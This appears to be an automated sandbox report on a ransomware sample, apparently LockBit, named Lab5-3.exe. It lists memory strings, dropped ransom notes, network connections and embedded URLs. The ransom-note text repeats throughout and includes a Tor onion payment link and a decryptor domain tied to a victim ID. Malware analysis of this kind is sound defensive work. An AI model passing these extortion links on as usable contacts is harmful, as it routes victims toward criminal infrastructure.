                      Source: Lab5-3.exe, 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Lab5-3.exe, 0000001B.00000000.1820658246.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exe, 0000001B.00000000.1820658246.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Lab5-3.exe, 0000001B.00000002.3768778326.0000000000AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Lab5-3.exe, 00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exe, 00000022.00000002.1879653667.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Lab5-3.exe, 00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exe, 00000022.00000000.1853803315.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Lab5-3.exe, 00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exe, 00000028.00000002.3209902730.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Lab5-3.exe, 00000028.00000000.1878107343.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exe, 00000028.00000000.1878107343.000000000041B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Lab5-3.exe, 00000028.00000002.3215191351.0000000000A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Lab5-3.exeString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exeString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? Starting IO threads...Unable to bind NOTE file IOCP %S error: %d
                      Source: Restore-My-Files.txt72.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt68.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt111.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt140.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt30.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt96.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt15.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt95.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt5.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt106.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt4.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt133.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt110.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt60.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt150.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt61.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt120.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt116.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt97.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt56.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt50.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt36.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt100.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt108.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt135.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt192.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt49.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt8.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt35.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt71.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt174.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt103.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt162.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt179.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt52.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt191.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt199.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt123.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt98.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt100.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt104.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt61.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt31.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt11.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt139.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt109.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt23.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt6.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt11.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt51.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt101.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt73.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt64.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt25.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt195.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt115.0.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt165.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt68.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt67.40.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt73.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt157.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Restore-My-Files.txt33.27.drString found in binary or memory: | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.202.106.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=crNMT2weYCUheMV&MD=zS4FTzTb HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=crNMT2weYCUheMV&MD=zS4FTzTb HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficDNS traffic detected: DNS query: google.com
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: Lab5-3.exe, 0000001B.00000003.2763814011.00000000208F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.jqueryui.com/droppable/
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: MakeAccessible.api.lockbit.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                      Source: Lab5-3.exe, 0000001B.00000003.2763814011.00000000208F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jquery.org/license
                      Source: Lab5-3.exe, 0000001B.00000003.2763814011.00000000208F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jqueryui.com
                      Source: Lab5-3.exeString found in binary or memory: http://lockbit-decryptor.top/?
                      Source: Lab5-3.exe, 0000001B.00000002.3768778326.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000002.3215191351.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.drString found in binary or memory: http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Lab5-3.exeString found in binary or memory: http://lockbitks2tvnmwk.onion/?
                      Source: Lab5-3.exe, 0000001B.00000002.3768778326.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000002.3215191351.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.drString found in binary or memory: http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: Lab5-3.exe, 00000028.00000003.2636402904.000000001E109000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E0C9000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E1C9000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E189000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2591083584.000000001E109000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E089000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000003.2636402904.000000001E149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bohemiancoding.com/sketch
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmp, MakeAccessible.api.lockbit.27.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: Lab5-3.exe, 0000001B.00000003.2763814011.00000000208F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zurb.com/playground/jquery-text-change-custom-event
                      Source: Lab5-3.exe, 00000000.00000003.1918395906.000000001B455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                      Source: Lab5-3.exe, 00000000.00000003.1918395906.000000001B455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
                      Source: Lab5-3.exe, 00000000.00000003.1918395906.000000001B455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
                      Source: Lab5-3.exe, 00000000.00000003.1918395906.000000001B455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
                      Source: Lab5-3.exe, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.dr, Restore-My-Files.txt56.27.drString found in binary or memory: https://bridges.torproject.org
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore/category/extensions
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enShortcut
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
                      Source: wctF86A.tmp.lockbit.0.drString found in binary or memory: https://dc.services.visualstudio.com/v2/track
                      Source: Lab5-3.exe, 00000000.00000003.2033908473.000000001B960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: wctF86A.tmp.lockbit.0.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.co
                      Source: wctF86A.tmp.lockbit.0.drString found in binary or memory: https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                      Source: Lab5-3.exe, 00000000.00000003.2033908473.000000001B960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comGoogle
                      Source: Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
